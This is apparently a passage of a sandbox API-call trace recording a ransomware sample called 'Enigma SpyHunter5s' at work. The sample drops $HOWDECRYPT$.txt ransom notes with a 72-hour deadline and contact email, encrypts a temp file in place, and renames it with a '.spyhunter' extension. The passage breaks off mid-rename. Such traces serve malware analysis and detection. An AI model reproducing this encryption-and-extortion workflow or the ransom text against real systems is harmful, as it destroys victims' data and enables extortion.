(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.991] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee04*=0x2ac, lpOverlapped=0x0) returned 1 [0152.991] CloseHandle (hObject=0x178) returned 1 [0152.991] GetProcessHeap () returned 0x2c0000 [0152.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe880 | out: hHeap=0x2c0000) returned 1 [0152.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\eng\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.991] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.992] WriteFile (in: hFile=0x178, lpBuffer=0x248ecd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ee00, lpOverlapped=0x0 | out: lpBuffer=0x248ecd7*, lpNumberOfBytesWritten=0x248ee00*=0x127, lpOverlapped=0x0) returned 1 [0152.992] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.992] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ee00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ee00*=0x2ac, lpOverlapped=0x0) returned 1 [0152.993] CloseHandle (hObject=0x178) returned 1 [0152.993] GetProcessHeap () returned 0x2c0000 [0152.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe738 | out: hHeap=0x2c0000) returned 1 [0152.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dut\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.993] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.993] WriteFile (in: hFile=0x178, lpBuffer=0x248ecd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x248ecd3*, lpNumberOfBytesWritten=0x248edfc*=0x127, lpOverlapped=0x0) returned 1 [0152.994] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.994] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edfc*=0x2ac, lpOverlapped=0x0) returned 1 [0152.994] CloseHandle (hObject=0x178) returned 1 [0152.994] GetProcessHeap () returned 0x2c0000 [0152.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe5f0 | out: hHeap=0x2c0000) returned 1 [0152.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\dan\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.995] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.995] WriteFile (in: hFile=0x178, lpBuffer=0x248eccf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edf8, lpOverlapped=0x0 | out: lpBuffer=0x248eccf*, lpNumberOfBytesWritten=0x248edf8*=0x127, lpOverlapped=0x0) returned 1 [0152.998] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.998] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edf8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edf8*=0x2ac, lpOverlapped=0x0) returned 1 [0152.998] CloseHandle (hObject=0x178) returned 1 [0152.998] GetProcessHeap () returned 0x2c0000 [0152.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe360 | out: hHeap=0x2c0000) returned 1 [0152.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brz\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0152.999] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.999] WriteFile (in: hFile=0x178, lpBuffer=0x248eccb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x248eccb*, lpNumberOfBytesWritten=0x248edf4*=0x127, lpOverlapped=0x0) returned 1 [0153.000] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.000] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edf4*=0x2ac, lpOverlapped=0x0) returned 1 [0153.000] CloseHandle (hObject=0x178) returned 1 [0153.000] GetProcessHeap () returned 0x2c0000 [0153.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe218 | out: hHeap=0x2c0000) returned 1 [0153.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\brt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.001] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.001] WriteFile (in: hFile=0x178, lpBuffer=0x248ecc7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edf0, lpOverlapped=0x0 | out: lpBuffer=0x248ecc7*, lpNumberOfBytesWritten=0x248edf0*=0x127, lpOverlapped=0x0) returned 1 [0153.002] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.002] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edf0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edf0*=0x2ac, lpOverlapped=0x0) returned 1 [0153.002] CloseHandle (hObject=0x178) returned 1 [0153.002] GetProcessHeap () returned 0x2c0000 [0153.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe0d0 | out: hHeap=0x2c0000) returned 1 [0153.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\all\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.003] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0153.003] WriteFile (in: hFile=0x178, lpBuffer=0x248ecc3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x248ecc3*, lpNumberOfBytesWritten=0x248edec*=0x127, lpOverlapped=0x0) returned 1 [0153.004] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0153.004] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248edec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248edec*=0x2ac, lpOverlapped=0x0) returned 1 [0153.004] CloseHandle (hObject=0x178) returned 1 [0153.004] GetProcessHeap () returned 0x2c0000 [0153.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbe4a8 | out: hHeap=0x2c0000) returned 1 [0153.004] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed88 | out: pbBuffer=0x248ed88) returned 1 [0153.004] GetProcessHeap () returned 0x2c0000 [0153.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.004] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed80*=0x30) returned 1 [0153.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.004] GetProcessHeap () returned 0x2c0000 [0153.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.004] GetProcessHeap () returned 0x2c0000 [0153.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4d98 | out: hHeap=0x2c0000) returned 1 [0153.005] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed88 | out: pbBuffer=0x248ed88) returned 1 [0153.005] GetProcessHeap () returned 0x2c0000 [0153.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.005] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed80*=0x30) returned 1 [0153.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.005] GetProcessHeap () returned 0x2c0000 [0153.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.005] GetProcessHeap () returned 0x2c0000 [0153.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4cb8 | out: hHeap=0x2c0000) returned 1 [0153.005] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed80 | out: pbBuffer=0x248ed80) returned 1 [0153.005] GetProcessHeap () returned 0x2c0000 [0153.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.005] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed78*=0x30) returned 1 [0153.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.005] GetProcessHeap () returned 0x2c0000 [0153.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.005] GetProcessHeap () returned 0x2c0000 [0153.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85488 | out: hHeap=0x2c0000) returned 1 [0153.005] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed80 | out: pbBuffer=0x248ed80) returned 1 [0153.006] GetProcessHeap () returned 0x2c0000 [0153.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.006] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed78*=0x30) returned 1 [0153.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0153.006] GetProcessHeap () returned 0x2c0000 [0153.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0153.006] GetProcessHeap () returned 0x2c0000 [0153.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c853c0 | out: hHeap=0x2c0000) returned 1 [0153.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed78 | out: pbBuffer=0x248ed78) returned 1 [0153.006] GetProcessHeap () returned 0x2c0000 [0153.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0153.006] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ed70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ed70*=0x30) returned 1 [0153.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH_Ca- k7Y.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\gh_ca- k7y.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0153.006] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH_Ca- k7Y.m4a") returned 67 [0153.006] StrStrW (lpFirst="gH_Ca- k7Y.m4a", lpSrch=".txt") returned 0x0 [0153.007] GetProcessHeap () returned 0x2c0000 [0153.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0153.007] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ed34*=0x2800, lpOverlapped=0x0) returned 1 [0153.007] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0153.007] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ed34*=0x2800, lpOverlapped=0x0) returned 1 [0153.008] GetProcessHeap () returned 0x2c0000 [0153.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0153.008] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.008] WriteFile (in: hFile=0x178, lpBuffer=0x248ed74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x248ed74*, lpNumberOfBytesWritten=0x248ed34*=0x4, lpOverlapped=0x0) returned 1 [0153.008] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ed34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ed34*=0x30, lpOverlapped=0x0) returned 1 [0153.008] CloseHandle (hObject=0x178) returned 1 [0153.008] GetProcessHeap () returned 0x2c0000 [0153.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0153.008] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\gH_Ca- k7Y.m4a.spyhunter") returned 77 [0153.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 